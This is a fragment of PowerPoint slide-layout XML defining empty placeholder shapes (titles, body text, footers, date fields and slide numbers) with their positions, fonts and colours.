          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38C7C42-4A8E-954B-9C86-FC629E6B4D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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fld id="{C0ADE207-3780-1940-99B7-EAE0EBD06D80}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10FB0EA-0C62-144C-9D4A-8E7FC2AF5332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D18B6837-99CB-5547-8C4E-7E6531B155E4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4163961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75990" y="404813"/>
            <a:ext cx="8506420" cy="981038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6300" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745049" y="1352075"/>
            <a:ext cx="8568303" cy="441467"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2394D7E-661D-B446-986B-E31D7346C13C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BA59BE-AD50-4042-9FEA-9973C1CC85CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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fld id="{45B6B041-910E-1B47-88F0-9C7558C9A673}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D2F1F8-F495-B74D-9190-DBC9A7ECB320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FC51D643-C6F1-C74C-AF06-3410E0345397}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130073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75990" y="404813"/>
            <a:ext cx="8506420" cy="981038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6300" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502920" y="1787652"/>
            <a:ext cx="4375404" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180076" y="1787652"/>
            <a:ext cx="4375404" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DB23F0-AA41-5E40-867C-86E47E80F2FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1286C4-B8DC-1541-BFB7-1121D3D34F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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fld id="{BC57B92D-EFEE-7749-8ED2-21AFE14A990F}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Holder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8387EE39-907B-3C43-9E02-7412D667FAD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{74F482CF-7F54-AB45-AD75-D6946BC72B02}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1141328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75990" y="404813"/>
            <a:ext cx="8506420" cy="981038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6300" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{595F765F-D312-5F45-9010-446A220B1AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{456AF46B-E6CF-D449-8B1D-4D7F0EE4A665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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fld id="{88D8F63D-E712-4447-B6A5-89359EE90EA1}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B562324-6E07-894C-AB7E-BBFE8CBAF22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B1E677C3-EA20-1F4F-8637-9BA2F2C20D8C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15720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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4471674-10E1-2943-AA2F-BF60F8075033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6924A9-588F-EB46-BE81-0302DB3CF843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{78C30860-3416-DA46-B535-CF48DA972B11}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C9799C1-8669-BD4C-B435-8AF138C350CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="282575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E248BD99-3159-E14F-AED6-AF9BA4E0C723}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1619968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520447" y="257530"/>
            <a:ext cx="3017506" cy="823752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5353" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508760" y="4352544"/>
            <a:ext cx="7040880" cy="607859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21768252-6C64-CE40-90DD-7B50E98E2B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{467DD23E-0EE1-8449-B2A7-1576FD804935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C979B769-206D-BD46-AE5A-27AC5349115F}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AF45AF0-B771-7149-9E3D-F657EA3CB454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{20425F97-0F88-EE49-ADF2-FB8D47C65789}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1888010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487426" y="257530"/>
            <a:ext cx="5083546" cy="823752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5353" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711355" y="1999000"/>
            <a:ext cx="8139806" cy="304058"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1976" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="5E5E5E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B0057B-56D4-B14F-9D48-70FEDD73146A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5373E46C-F781-EA44-9CE9-5759F60F8CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
